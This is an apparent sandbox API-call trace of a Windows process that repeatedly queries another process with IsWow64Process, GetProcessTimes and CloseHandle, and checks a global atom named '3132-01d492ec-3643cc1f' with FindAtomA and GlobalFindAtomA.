	[0129.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.469] CloseHandle (hObject=0x2dc) returned 1
	[0129.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.469] CloseHandle (hObject=0x2dc) returned 1
	[0129.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.469] CloseHandle (hObject=0x2dc) returned 1
	[0129.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.470] CloseHandle (hObject=0x2dc) returned 1
	[0129.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.470] CloseHandle (hObject=0x2dc) returned 1
	[0129.503] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.503] CloseHandle (hObject=0x2dc) returned 1
	[0129.503] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.503] CloseHandle (hObject=0x2dc) returned 1
	[0129.504] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.504] CloseHandle (hObject=0x2dc) returned 1
	[0129.504] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.504] CloseHandle (hObject=0x2dc) returned 1
	[0129.504] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.504] CloseHandle (hObject=0x2dc) returned 1
	[0129.504] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.504] CloseHandle (hObject=0x2dc) returned 1
	[0129.505] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.505] CloseHandle (hObject=0x2dc) returned 1
	[0129.505] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.505] CloseHandle (hObject=0x2dc) returned 1
	[0129.505] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.505] CloseHandle (hObject=0x2dc) returned 1
	[0129.505] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.505] CloseHandle (hObject=0x2dc) returned 1
	[0129.505] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.505] CloseHandle (hObject=0x2dc) returned 1
	[0129.506] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.506] CloseHandle (hObject=0x2dc) returned 1
	[0129.506] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.506] CloseHandle (hObject=0x2dc) returned 1
	[0129.506] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.506] CloseHandle (hObject=0x2dc) returned 1
	[0129.506] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.506] CloseHandle (hObject=0x2dc) returned 1
	[0129.507] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.507] CloseHandle (hObject=0x2dc) returned 1
	[0129.507] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.507] CloseHandle (hObject=0x2dc) returned 1
	[0129.507] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.507] CloseHandle (hObject=0x2dc) returned 1
	[0129.507] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.507] CloseHandle (hObject=0x2dc) returned 1
	[0129.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.508] CloseHandle (hObject=0x2dc) returned 1
	[0129.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.508] CloseHandle (hObject=0x2dc) returned 1
	[0129.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.508] CloseHandle (hObject=0x2dc) returned 1
	[0129.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.508] CloseHandle (hObject=0x2dc) returned 1
	[0129.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.509] CloseHandle (hObject=0x2dc) returned 1
	[0129.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.509] CloseHandle (hObject=0x2dc) returned 1
	[0129.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.509] CloseHandle (hObject=0x2dc) returned 1
	[0129.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.509] CloseHandle (hObject=0x2dc) returned 1
	[0129.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.510] CloseHandle (hObject=0x2dc) returned 1
	[0129.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.510] CloseHandle (hObject=0x2dc) returned 1
	[0129.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.510] CloseHandle (hObject=0x2dc) returned 1
	[0129.510] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.511] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.511] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.511] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.511] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.511] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.512] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.512] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.512] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.512] CloseHandle (hObject=0x2dc) returned 1
	[0129.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.512] CloseHandle (hObject=0x2dc) returned 1
	[0129.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.512] CloseHandle (hObject=0x2dc) returned 1
	[0129.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.513] CloseHandle (hObject=0x2dc) returned 1
	[0129.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.513] CloseHandle (hObject=0x2dc) returned 1
	[0129.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.514] CloseHandle (hObject=0x2dc) returned 1
	[0129.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.548] CloseHandle (hObject=0x2dc) returned 1
	[0129.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.549] CloseHandle (hObject=0x2dc) returned 1
	[0129.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.549] CloseHandle (hObject=0x2dc) returned 1
	[0129.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.549] CloseHandle (hObject=0x2dc) returned 1
	[0129.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.549] CloseHandle (hObject=0x2dc) returned 1
	[0129.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.550] CloseHandle (hObject=0x2dc) returned 1
	[0129.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.550] CloseHandle (hObject=0x2dc) returned 1
	[0129.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.550] CloseHandle (hObject=0x2dc) returned 1
	[0129.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.550] CloseHandle (hObject=0x2dc) returned 1
	[0129.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.551] CloseHandle (hObject=0x2dc) returned 1
	[0129.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.551] CloseHandle (hObject=0x2dc) returned 1
	[0129.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.551] CloseHandle (hObject=0x2dc) returned 1
	[0129.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.551] CloseHandle (hObject=0x2dc) returned 1
	[0129.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.552] CloseHandle (hObject=0x2dc) returned 1
	[0129.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.552] CloseHandle (hObject=0x2dc) returned 1
	[0129.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.552] CloseHandle (hObject=0x2dc) returned 1
	[0129.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.552] CloseHandle (hObject=0x2dc) returned 1
	[0129.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.553] CloseHandle (hObject=0x2dc) returned 1
	[0129.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.553] CloseHandle (hObject=0x2dc) returned 1
	[0129.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.553] CloseHandle (hObject=0x2dc) returned 1
	[0129.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.553] CloseHandle (hObject=0x2dc) returned 1
	[0129.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.554] CloseHandle (hObject=0x2dc) returned 1
	[0129.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.554] CloseHandle (hObject=0x2dc) returned 1
	[0129.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.554] CloseHandle (hObject=0x2dc) returned 1
	[0129.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.554] CloseHandle (hObject=0x2dc) returned 1
	[0129.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.554] CloseHandle (hObject=0x2dc) returned 1
	[0129.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.555] CloseHandle (hObject=0x2dc) returned 1
	[0129.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.555] CloseHandle (hObject=0x2dc) returned 1
	[0129.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.555] CloseHandle (hObject=0x2dc) returned 1
	[0129.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.555] CloseHandle (hObject=0x2dc) returned 1
	[0129.556] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.556] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.556] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.556] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.557] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.557] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.557] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.557] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.557] CloseHandle (hObject=0x2dc) returned 1
	[0129.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.558] CloseHandle (hObject=0x2dc) returned 1
	[0129.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.558] CloseHandle (hObject=0x2dc) returned 1
	[0129.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.558] CloseHandle (hObject=0x2dc) returned 1
	[0129.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.558] CloseHandle (hObject=0x2dc) returned 1
	[0129.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.559] CloseHandle (hObject=0x2dc) returned 1
	[0129.591] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.591] CloseHandle (hObject=0x2dc) returned 1
	[0129.591] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.591] CloseHandle (hObject=0x2dc) returned 1
	[0129.592] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.592] CloseHandle (hObject=0x2dc) returned 1
	[0129.592] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.592] CloseHandle (hObject=0x2dc) returned 1
	[0129.592] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.592] CloseHandle (hObject=0x2dc) returned 1
	[0129.592] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.592] CloseHandle (hObject=0x2dc) returned 1
	[0129.592] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.592] CloseHandle (hObject=0x2dc) returned 1
	[0129.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.593] CloseHandle (hObject=0x2dc) returned 1
	[0129.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.593] CloseHandle (hObject=0x2dc) returned 1
	[0129.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.593] CloseHandle (hObject=0x2dc) returned 1
	[0129.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.593] CloseHandle (hObject=0x2dc) returned 1
	[0129.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.594] CloseHandle (hObject=0x2dc) returned 1
	[0129.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.594] CloseHandle (hObject=0x2dc) returned 1
	[0129.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.594] CloseHandle (hObject=0x2dc) returned 1
	[0129.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.594] CloseHandle (hObject=0x2dc) returned 1
	[0129.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.595] CloseHandle (hObject=0x2dc) returned 1
	[0129.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.595] CloseHandle (hObject=0x2dc) returned 1
	[0129.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.595] CloseHandle (hObject=0x2dc) returned 1
	[0129.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.595] CloseHandle (hObject=0x2dc) returned 1
	[0129.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.596] CloseHandle (hObject=0x2dc) returned 1
	[0129.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.596] CloseHandle (hObject=0x2dc) returned 1
	[0129.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.596] CloseHandle (hObject=0x2dc) returned 1
	[0129.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.596] CloseHandle (hObject=0x2dc) returned 1
	[0129.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.596] CloseHandle (hObject=0x2dc) returned 1
	[0129.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.597] CloseHandle (hObject=0x2dc) returned 1
	[0129.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.597] CloseHandle (hObject=0x2dc) returned 1
	[0129.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.597] CloseHandle (hObject=0x2dc) returned 1
	[0129.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.597] CloseHandle (hObject=0x2dc) returned 1
	[0129.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.598] CloseHandle (hObject=0x2dc) returned 1
	[0129.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.598] CloseHandle (hObject=0x2dc) returned 1
	[0129.598] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.598] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.598] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.599] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.599] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.600] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.600] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.600] CloseHandle (hObject=0x2dc) returned 1
	[0129.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.600] CloseHandle (hObject=0x2dc) returned 1
	[0129.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.600] CloseHandle (hObject=0x2dc) returned 1
	[0129.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.601] CloseHandle (hObject=0x2dc) returned 1
	[0129.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.601] CloseHandle (hObject=0x2dc) returned 1
	[0129.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.601] CloseHandle (hObject=0x2dc) returned 1
	[0129.633] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.634] CloseHandle (hObject=0x2dc) returned 1
	[0129.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.634] CloseHandle (hObject=0x2dc) returned 1
	[0129.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.634] CloseHandle (hObject=0x2dc) returned 1
	[0129.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.634] CloseHandle (hObject=0x2dc) returned 1
	[0129.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.635] CloseHandle (hObject=0x2dc) returned 1
	[0129.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.635] CloseHandle (hObject=0x2dc) returned 1
	[0129.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.635] CloseHandle (hObject=0x2dc) returned 1
	[0129.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.635] CloseHandle (hObject=0x2dc) returned 1
	[0129.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.635] CloseHandle (hObject=0x2dc) returned 1
	[0129.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.636] CloseHandle (hObject=0x2dc) returned 1
	[0129.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.636] CloseHandle (hObject=0x2dc) returned 1
	[0129.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.636] CloseHandle (hObject=0x2dc) returned 1
	[0129.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.636] CloseHandle (hObject=0x2dc) returned 1
	[0129.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.637] CloseHandle (hObject=0x2dc) returned 1
	[0129.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.637] CloseHandle (hObject=0x2dc) returned 1
	[0129.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.637] CloseHandle (hObject=0x2dc) returned 1
	[0129.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.637] CloseHandle (hObject=0x2dc) returned 1
	[0129.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.638] CloseHandle (hObject=0x2dc) returned 1
	[0129.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.638] CloseHandle (hObject=0x2dc) returned 1
	[0129.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.638] CloseHandle (hObject=0x2dc) returned 1
	[0129.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.638] CloseHandle (hObject=0x2dc) returned 1
	[0129.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.639] CloseHandle (hObject=0x2dc) returned 1
	[0129.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.639] CloseHandle (hObject=0x2dc) returned 1
	[0129.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.639] CloseHandle (hObject=0x2dc) returned 1
	[0129.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.639] CloseHandle (hObject=0x2dc) returned 1
	[0129.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.639] CloseHandle (hObject=0x2dc) returned 1
	[0129.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.640] CloseHandle (hObject=0x2dc) returned 1
	[0129.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.640] CloseHandle (hObject=0x2dc) returned 1
	[0129.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.640] CloseHandle (hObject=0x2dc) returned 1
	[0129.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.640] CloseHandle (hObject=0x2dc) returned 1
	[0129.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.641] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
